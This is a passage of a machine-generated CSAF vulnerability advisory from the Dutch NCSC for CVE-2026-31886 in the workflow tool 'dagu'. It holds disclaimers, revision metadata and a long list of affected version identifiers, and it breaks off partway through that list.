{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-31886", "tracking": { "current_release_date": "2026-03-26T01:47:22.489713Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-31886", "initial_release_date": "2026-03-13T16:48:15.893052Z", "revision_history": [ { "date": "2026-03-13T16:48:15.893052Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-13T16:48:19.823057Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-13T19:38:41.735848Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-13T19:38:47.850064Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-13T20:31:33.385506Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-13T20:31:40.063708Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-13T20:39:05.359855Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-14T14:51:52.171727Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-14T14:52:00.668645Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-16T01:27:32.124814Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-16T16:43:02.358901Z", "number": "11", "summary": "References created (3)." }, { "date": "2026-03-16T16:43:04.728346Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-18T15:27:41.301464Z", "number": "13", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-18T15:27:48.847781Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:28:49.749705Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-03-19T15:28:51.750026Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:32:24.609698Z", "number": "17", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:32:26.975341Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:50.505841Z", "number": "19", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (4).| CWES updated (1)." }, { "date": "2026-03-25T18:13:52.682762Z", "number": "20", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:15:23.438188Z", "number": "21", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)." }, { "date": "2026-03-25T21:44:02.687093Z", "number": "22", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (195).| Products created (14).| References created (4).| CWES updated (1)." } ], "status": "interim", "version": "22" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.2.4", "product": { "name": "vers:unknown/<2.2.4", "product_id": "CSAFPID-5844410", "product_identification_helper": { "cpe": "cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "dagu" } ], "category": "vendor", "name": "dagu" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.2.4", "product": { "name": "vers:unknown/<2.2.4", "product_id": "CSAFPID-5825017" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=2.2.4", "product": { "name": "vers:unknown/>=0|<=2.2.4", "product_id": "CSAFPID-5907261" } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.1", "product": { "name": "vers:unknown/v1.0.1", "product_id": "CSAFPID-5700905" } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.2", "product": { "name": "vers:unknown/v1.0.2", "product_id": "CSAFPID-5700906" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.0", "product": { "name": "vers:unknown/v1.1.0", "product_id": "CSAFPID-5700907" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.1", "product": { "name": "vers:unknown/v1.1.1", "product_id": "CSAFPID-5700908" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.2", "product": { "name": "vers:unknown/v1.1.2", "product_id": "CSAFPID-5700909" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.3", "product": { "name": "vers:unknown/v1.1.3", "product_id": "CSAFPID-5700910" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.4", "product": { "name": "vers:unknown/v1.1.4", "product_id": "CSAFPID-5700911" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.5", "product": { "name": "vers:unknown/v1.1.5", "product_id": "CSAFPID-5700912" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.6", "product": { "name": "vers:unknown/v1.1.6", "product_id": "CSAFPID-5700913" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.7", "product": { "name": "vers:unknown/v1.1.7", "product_id": "CSAFPID-5700914" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.8", "product": { "name": "vers:unknown/v1.1.8", "product_id": "CSAFPID-5700915" } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.9", "product": { "name": "vers:unknown/v1.1.9", "product_id": "CSAFPID-5700916" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.1", "product": { "name": "vers:unknown/v1.10.1", "product_id": "CSAFPID-5700917" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.2", "product": { "name": "vers:unknown/v1.10.2", "product_id": "CSAFPID-5700918" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.3", "product": { "name": "vers:unknown/v1.10.3", "product_id": "CSAFPID-5700919" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.4", "product": { "name": "vers:unknown/v1.10.4", "product_id": "CSAFPID-5700920" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.5", "product": { "name": "vers:unknown/v1.10.5", "product_id": "CSAFPID-5700921" } }, { "category": "product_version_range", "name": "vers:unknown/v1.10.6", "product": { "name": "vers:unknown/v1.10.6", "product_id": "CSAFPID-5700922" } }, { "category": "product_version_range", "name": "vers:unknown/v1.11.0", "product": { "name": "vers:unknown/v1.11.0", "product_id": "CSAFPID-5700923" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.0", "product": { "name": "vers:unknown/v1.12.0", "product_id": "CSAFPID-5700924" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.1", "product": { "name": "vers:unknown/v1.12.1", "product_id": "CSAFPID-5700925" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.10", "product": { "name": "vers:unknown/v1.12.10", "product_id": "CSAFPID-5700926" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.11", "product": { "name": "vers:unknown/v1.12.11", "product_id": "CSAFPID-5700927" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.2", "product": { "name": "vers:unknown/v1.12.2", "product_id": "CSAFPID-5700928" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.3", "product": { "name": "vers:unknown/v1.12.3", "product_id": "CSAFPID-5700929" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.4", "product": { "name": "vers:unknown/v1.12.4", "product_id": "CSAFPID-5700930" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.5", "product": { "name": "vers:unknown/v1.12.5", "product_id": "CSAFPID-5700931" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.6", "product": { "name": "vers:unknown/v1.12.6", "product_id": "CSAFPID-5700932" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.7", "product": { "name": "vers:unknown/v1.12.7", "product_id": "CSAFPID-5700933" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.8", "product": { "name": "vers:unknown/v1.12.8", "product_id": "CSAFPID-5700934" } }, { "category": "product_version_range", "name": "vers:unknown/v1.12.9", "product": { "name": "vers:unknown/v1.12.9", "product_id": "CSAFPID-5700935" } }, { "category": "product_version_range", "name": "vers:unknown/v1.13.0", "product": { "name": "vers:unknown/v1.13.0", "product_id": "CSAFPID-5700936" } }, { "category": "product_version_range", "name": "vers:unknown/v1.13.1", "product": { "name": "vers:unknown/v1.13.1", "product_id": "CSAFPID-5700937" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.0", "product": { "name": "vers:unknown/v1.14.0", "product_id": "CSAFPID-5700938" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.1", "product": { "name": "vers:unknown/v1.14.1", "product_id": "CSAFPID-5700939" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.2", "product": { "name": "vers:unknown/v1.14.2", "product_id": "CSAFPID-5700940" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.3", "product": { "name": "vers:unknown/v1.14.3", "product_id": "CSAFPID-5700941" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.4", "product": { "name": "vers:unknown/v1.14.4", "product_id": "CSAFPID-5700942" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.5", "product": { "name": "vers:unknown/v1.14.5", "product_id": "CSAFPID-5700943" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.6", "product": { "name": "vers:unknown/v1.14.6", "product_id": "CSAFPID-5700944" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.7", "product": { "name": "vers:unknown/v1.14.7", "product_id": "CSAFPID-5700945" } }, { "category": "product_version_range", "name": "vers:unknown/v1.14.8", "product": { "name": "vers:unknown/v1.14.8", "product_id": "CSAFPID-5700946" } }, { "category": "product_version_range", "name": "vers:unknown/v1.15.0", "product": { "name": "vers:unknown/v1.15.0", "product_id": "CSAFPID-5700947" } }, { "category": "product_version_range", "name": "vers:unknown/v1.15.1", "product": { "name": "vers:unknown/v1.15.1", "product_id": "CSAFPID-5700948" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.0", "product": { "name": "vers:unknown/v1.16.0", "product_id": "CSAFPID-5700949" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.1", "product": { "name": "vers:unknown/v1.16.1", "product_id": "CSAFPID-5700950" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.10", "product": { "name": "vers:unknown/v1.16.10", "product_id": "CSAFPID-5730985" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.11", "product": { "name": "vers:unknown/v1.16.11", "product_id": "CSAFPID-5730986" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.12", "product": { "name": "vers:unknown/v1.16.12", "product_id": "CSAFPID-5730987" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.2", "product": { "name": "vers:unknown/v1.16.2", "product_id": "CSAFPID-5700951" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.3", "product": { "name": "vers:unknown/v1.16.3", "product_id": "CSAFPID-5700952" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.4", "product": { "name": "vers:unknown/v1.16.4", "product_id": "CSAFPID-5700953" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.5", "product": { "name": "vers:unknown/v1.16.5", "product_id": "CSAFPID-5700954" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.6", "product": { "name": "vers:unknown/v1.16.6", "product_id": "CSAFPID-5700955" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.7", "product": { "name": "vers:unknown/v1.16.7", "product_id": "CSAFPID-5700956" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.8", "product": { "name": "vers:unknown/v1.16.8", "product_id": "CSAFPID-5730988" } }, { "category": "product_version_range", "name": "vers:unknown/v1.16.9", "product": { "name": "vers:unknown/v1.16.9", "product_id": "CSAFPID-5730989" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0", "product": { "name": "vers:unknown/v1.17.0", "product_id": "CSAFPID-5730990" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.10", "product": { "name": "vers:unknown/v1.17.0-beta.10", "product_id": "CSAFPID-5730991" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.11", "product": { "name": "vers:unknown/v1.17.0-beta.11", "product_id": "CSAFPID-5730992" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.12", "product": { "name": "vers:unknown/v1.17.0-beta.12", "product_id": "CSAFPID-5730993" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.13", "product": { "name": "vers:unknown/v1.17.0-beta.13", "product_id": "CSAFPID-5730994" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.14", "product": { "name": "vers:unknown/v1.17.0-beta.14", "product_id": "CSAFPID-5730995" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.15", "product": { "name": "vers:unknown/v1.17.0-beta.15", "product_id": "CSAFPID-5730996" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.2", "product": { "name": "vers:unknown/v1.17.0-beta.2", "product_id": "CSAFPID-5730997" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.3", "product": { "name": "vers:unknown/v1.17.0-beta.3", "product_id": "CSAFPID-5730998" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.4", "product": { "name": "vers:unknown/v1.17.0-beta.4", "product_id": "CSAFPID-5730999" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.5", "product": { "name": "vers:unknown/v1.17.0-beta.5", "product_id": "CSAFPID-5731000" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.6", "product": { "name": "vers:unknown/v1.17.0-beta.6", "product_id": "CSAFPID-5731001" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.7", "product": { "name": "vers:unknown/v1.17.0-beta.7", "product_id": "CSAFPID-5731002" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.8", "product": { "name": "vers:unknown/v1.17.0-beta.8", "product_id": "CSAFPID-5731003" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.0-beta.9", "product": { "name": "vers:unknown/v1.17.0-beta.9", "product_id": "CSAFPID-5731004" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.1", "product": { "name": "vers:unknown/v1.17.1", "product_id": "CSAFPID-5731005" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.2", "product": { "name": "vers:unknown/v1.17.2", "product_id": "CSAFPID-5731006" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.3", "product": { "name": "vers:unknown/v1.17.3", "product_id": "CSAFPID-5731007" } }, { "category": "product_version_range", "name": "vers:unknown/v1.17.4", "product": { "name": "vers:unknown/v1.17.4", "product_id": "CSAFPID-5731008" } }, { "category": "product_version_range", "name": "vers:unknown/v1.18.0", "product": { "name": "vers:unknown/v1.18.0", "product_id": "CSAFPID-5731009" } }, { "category": "product_version_range", "name": "vers:unknown/v1.18.1", "product": { "name": "vers:unknown/v1.18.1", "product_id": "CSAFPID-5731010" } }, { "category": "product_version_range", "name": "vers:unknown/v1.18.2", "product": { "name": "vers:unknown/v1.18.2", "product_id": "CSAFPID-5731011" } }, { "category": "product_version_range", "name": "vers:unknown/v1.18.3", "product": { "name": "vers:unknown/v1.18.3", "product_id": "CSAFPID-5731012" } }, { "category": "product_version_range", "name": "vers:unknown/v1.18.4", "product": { "name": "vers:unknown/v1.18.4", "product_id": "CSAFPID-5731013" } }, { "category": "product_version_range", "name": "vers:unknown/v1.19.0", "product": { "name": "vers:unknown/v1.19.0", "product_id": "CSAFPID-5731014" } }, { "category": "product_version_range", "name": "vers:unknown/v1.19.1", "product": { "name": "vers:unknown/v1.19.1", "product_id": "CSAFPID-5731015" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.10", "product": { "name": "vers:unknown/v1.2.10", "product_id": "CSAFPID-5700957" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.11", "product": { "name": "vers:unknown/v1.2.11", "product_id": "CSAFPID-5700958" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.12", "product": { "name": "vers:unknown/v1.2.12", "product_id": "CSAFPID-5700959" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.13", "product": { "name": "vers:unknown/v1.2.13", "product_id": "CSAFPID-5700960" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.14", "product": { "name": "vers:unknown/v1.2.14", "product_id": "CSAFPID-5700961" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.15", "product": { "name": "vers:unknown/v1.2.15", "product_id": "CSAFPID-5700962" } }, { "category": "product_version_range", "name": "vers:unknown/v1.2.16", "product": { "name": "vers:unknown/v1.2.16", "product_id": "CSAFPID-5700963" } }, { "category": "product_version_range", "name": "vers:unknown/v1.20.0", "product": { "name": "vers:unknown/v1.20.0", "product_id": "CSAFPID-5731016" } }, { "category": "product_version_range", "name": "vers:unknown/v1.21.0", "product": { "name": "vers:unknown/v1.21.0", "product_id": "CSAFPID-5731017" } }, { "category": "product_version_range", "name": "vers:unknown/v1.22.0", "product": { "name": "vers:unknown/v1.22.0", "product_id": "CSAFPID-5731018" } }, { "category": "product_version_range", "name": "vers:unknown/v1.22.1", "product": { "name": "vers:unknown/v1.22.1", "product_id": "CSAFPID-5731019" } }, { "category": "product_version_range", "name": "vers:unknown/v1.22.2", "product": { "name": "vers:unknown/v1.22.2", "product_id": "CSAFPID-5731020" } }, { "category": "product_version_range", "name": "vers:unknown/v1.22.3", "product": { "name": "vers:unknown/v1.22.3", "product_id": "CSAFPID-5731021" } }, { "category": "product_version_range", "name": "vers:unknown/v1.22.4", "product": { "name": "vers:unknown/v1.22.4", "product_id": "CSAFPID-5731022" } }, { "category": "product_version_range", "name": "vers:unknown/v1.23.0", "product": { "name": "vers:unknown/v1.23.0", "product_id": "CSAFPID-5731023" } }, { "category": "product_version_range", "name": "vers:unknown/v1.23.1", "product": { "name": "vers:unknown/v1.23.1", "product_id": "CSAFPID-5731024" } }, { "category": "product_version_range", "name": "vers:unknown/v1.23.2", "product": { "name": "vers:unknown/v1.23.2", "product_id": "CSAFPID-5731025" } }, { "category": "product_version_range", "name": "vers:unknown/v1.23.4", "product": { "name": "vers:unknown/v1.23.4", "product_id": "CSAFPID-5731026" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.0", "product": { "name": "vers:unknown/v1.24.0", "product_id": "CSAFPID-5731027" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.1", "product": { "name": "vers:unknown/v1.24.1", "product_id": "CSAFPID-5731028" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.11", "product": { "name": "vers:unknown/v1.24.11", "product_id": "CSAFPID-5731029" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.2", "product": { "name": "vers:unknown/v1.24.2", "product_id": "CSAFPID-5731030" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.3", "product": { "name": "vers:unknown/v1.24.3", "product_id": "CSAFPID-5731031" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.4", "product": { "name": "vers:unknown/v1.24.4", "product_id": "CSAFPID-5731032" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.5", "product": { "name": "vers:unknown/v1.24.5", "product_id": "CSAFPID-5731033" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.6", "product": { "name": "vers:unknown/v1.24.6", "product_id": "CSAFPID-5731034" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.7", "product": { "name": "vers:unknown/v1.24.7", "product_id": "CSAFPID-5731035" } }, { "category": "product_version_range", "name": "vers:unknown/v1.24.8", "product": { "name": "vers:unknown/v1.24.8", "product_id": "CSAFPID-5731036" } }, { "category": "product_version_range", "name": "vers:unknown/v1.25.0", "product": { "name": "vers:unknown/v1.25.0", "product_id": "CSAFPID-5731037" } }, { "category": "product_version_range", "name": "vers:unknown/v1.25.1", "product": { "name": "vers:unknown/v1.25.1", "product_id": "CSAFPID-5731038" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.0", "product": { "name": "vers:unknown/v1.26.0", "product_id": "CSAFPID-5731039" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.1", "product": { "name": "vers:unknown/v1.26.1", "product_id": "CSAFPID-5731040" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.2", "product": { "name": "vers:unknown/v1.26.2", "product_id": "CSAFPID-5731041" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.3", "product": { "name": "vers:unknown/v1.26.3", "product_id": "CSAFPID-5731042" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.4", "product": { "name": "vers:unknown/v1.26.4", "product_id": "CSAFPID-5731043" } }, { "category": "product_version_range", "name": "vers:unknown/v1.26.5", "product": { "name": "vers:unknown/v1.26.5", "product_id": "CSAFPID-5731044" } }, { "category": "product_version_range", "name": "vers:unknown/v1.27.0", "product": { "name": "vers:unknown/v1.27.0", "product_id": "CSAFPID-5731045" } }, { "category": "product_version_range", "name": "vers:unknown/v1.28.0", "product": { "name": "vers:unknown/v1.28.0", "product_id": "CSAFPID-5731046" } }, { "category": "product_version_range", "name": "vers:unknown/v1.29.0", "product": { "name": "vers:unknown/v1.29.0", "product_id": "CSAFPID-5731047" } }, { "category": "product_version_range", "name": "vers:unknown/v1.29.1", "product": { "name": "vers:unknown/v1.29.1", "product_id": "CSAFPID-5731048" } }, { "category": "product_version_range", "name": "vers:unknown/v1.29.2", "product": { "name": "vers:unknown/v1.29.2", "product_id": "CSAFPID-5731049" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.0", "product": { "name": "vers:unknown/v1.3.0", "product_id": "CSAFPID-5700964" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.1", "product": { "name": "vers:unknown/v1.3.1", "product_id": "CSAFPID-5700965" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.10", "product": { "name": "vers:unknown/v1.3.10", "product_id": "CSAFPID-5700966" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.11", "product": { "name": "vers:unknown/v1.3.11", "product_id": "CSAFPID-5700967" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.12", "product": { "name": "vers:unknown/v1.3.12", "product_id": "CSAFPID-5700968" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.13", "product": { "name": "vers:unknown/v1.3.13", "product_id": "CSAFPID-5700969" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.14", "product": { "name": "vers:unknown/v1.3.14", "product_id": "CSAFPID-5700970" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.15", "product": { "name": "vers:unknown/v1.3.15", "product_id": "CSAFPID-5700971" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.16", "product": { "name": "vers:unknown/v1.3.16", "product_id": "CSAFPID-5700972" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.17", "product": { "name": "vers:unknown/v1.3.17", "product_id": "CSAFPID-5700973" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.18", "product": { "name": "vers:unknown/v1.3.18", "product_id": "CSAFPID-5700974" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.19", "product": { "name": "vers:unknown/v1.3.19", "product_id": "CSAFPID-5700975" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.2", "product": { "name": "vers:unknown/v1.3.2", "product_id": "CSAFPID-5700976" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.20", "product": { "name": "vers:unknown/v1.3.20", "product_id": "CSAFPID-5700977" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.21", "product": { "name": "vers:unknown/v1.3.21", "product_id": "CSAFPID-5700978" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.3", "product": { "name": "vers:unknown/v1.3.3", "product_id": "CSAFPID-5700979" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.4", "product": { "name": "vers:unknown/v1.3.4", "product_id": "CSAFPID-5700980" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.5", "product": { "name": "vers:unknown/v1.3.5", "product_id": "CSAFPID-5700981" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.6", "product": { "name": "vers:unknown/v1.3.6", "product_id": "CSAFPID-5700982" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.7", "product": { "name": "vers:unknown/v1.3.7", "product_id": "CSAFPID-5700983" } }, { "category": "product_version_range", "name": "vers:unknown/v1.3.8", "product": { "name": "vers:unknown/v1.3.8", "product_id": "CSAFPID-5700984" } }, { "category": "product_version_range", "name": "vers:unknown/v1.30.0", "product": { "name": "vers:unknown/v1.30.0", "product_id": "CSAFPID-5731050" } }, { "category": "product_version_range", "name": "vers:unknown/v1.30.1", "product": { "name": "vers:unknown/v1.30.1", "product_id": "CSAFPID-5731051" } }, { "category": "product_version_range", "name": "vers:unknown/v1.30.2", "product": { "name": "vers:unknown/v1.30.2", "product_id": "CSAFPID-5731052" } }, { "category": "product_version_range", "name": "vers:unknown/v1.30.3", "product": { "name": "vers:unknown/v1.30.3", "product_id": "CSAFPID-5731053" } }, { "category": "product_version_range", "name": "vers:unknown/v1.4.0", "product": { "name": "vers:unknown/v1.4.0", "product_id": "CSAFPID-5700985" } }, { "category": "product_version_range", "name": "vers:unknown/v1.4.1", "product": { "name": "vers:unknown/v1.4.1", "product_id": "CSAFPID-5700986" } }, { "category": "product_version_range", "name": "vers:unknown/v1.4.2", "product": { "name": "vers:unknown/v1.4.2", "product_id": "CSAFPID-5700987" } }, { "category": "product_version_range", "name": "vers:unknown/v1.4.3", "product": { "name": "vers:unknown/v1.4.3", "product_id": "CSAFPID-5700988" } }, { "category": "product_version_range", "name": "vers:unknown/v1.4.4", "product": { "name": "vers:unknown/v1.4.4", "product_id": "CSAFPID-5700989" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.0", "product": { "name": "vers:unknown/v1.5.0", "product_id": "CSAFPID-5700990" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.1", "product": { "name": "vers:unknown/v1.5.1", "product_id": "CSAFPID-5700991" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.2", "product": { "name": "vers:unknown/v1.5.2", "product_id": "CSAFPID-5700992" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.3", "product": { "name": "vers:unknown/v1.5.3", "product_id": "CSAFPID-5700993" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.4", "product": { "name": "vers:unknown/v1.5.4", "product_id": "CSAFPID-5700994" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.5", "product": { "name": "vers:unknown/v1.5.5", "product_id": "CSAFPID-5700995" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.6", "product": { "name": "vers:unknown/v1.5.6", "product_id": "CSAFPID-5700996" } }, { "category": "product_version_range", "name": "vers:unknown/v1.5.7", "product": { "name": "vers:unknown/v1.5.7", "product_id": "CSAFPID-5700997" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.0", "product": { "name": "vers:unknown/v1.6.0", "product_id": "CSAFPID-5700998" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.1", "product": { "name": "vers:unknown/v1.6.1", "product_id": "CSAFPID-5700999" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.2", "product": { "name": "vers:unknown/v1.6.2", "product_id": "CSAFPID-5701000" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.3", "product": { "name": "vers:unknown/v1.6.3", "product_id": "CSAFPID-5701001" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.4", "product": { "name": "vers:unknown/v1.6.4", "product_id": "CSAFPID-5701002" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.5", "product": { "name": "vers:unknown/v1.6.5", "product_id": "CSAFPID-5701003" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.6", "product": { "name": "vers:unknown/v1.6.6", "product_id": "CSAFPID-5701004" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.7", "product": { "name": "vers:unknown/v1.6.7", "product_id": "CSAFPID-5701005" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.8", "product": { "name": "vers:unknown/v1.6.8", "product_id": "CSAFPID-5701006" } }, { "category": "product_version_range", "name": "vers:unknown/v1.6.9", "product": { "name": "vers:unknown/v1.6.9", "product_id": "CSAFPID-5701007" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.10", "product": { "name": "vers:unknown/v1.7.10", "product_id": "CSAFPID-5701008" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.11", "product": { "name": "vers:unknown/v1.7.11", "product_id": 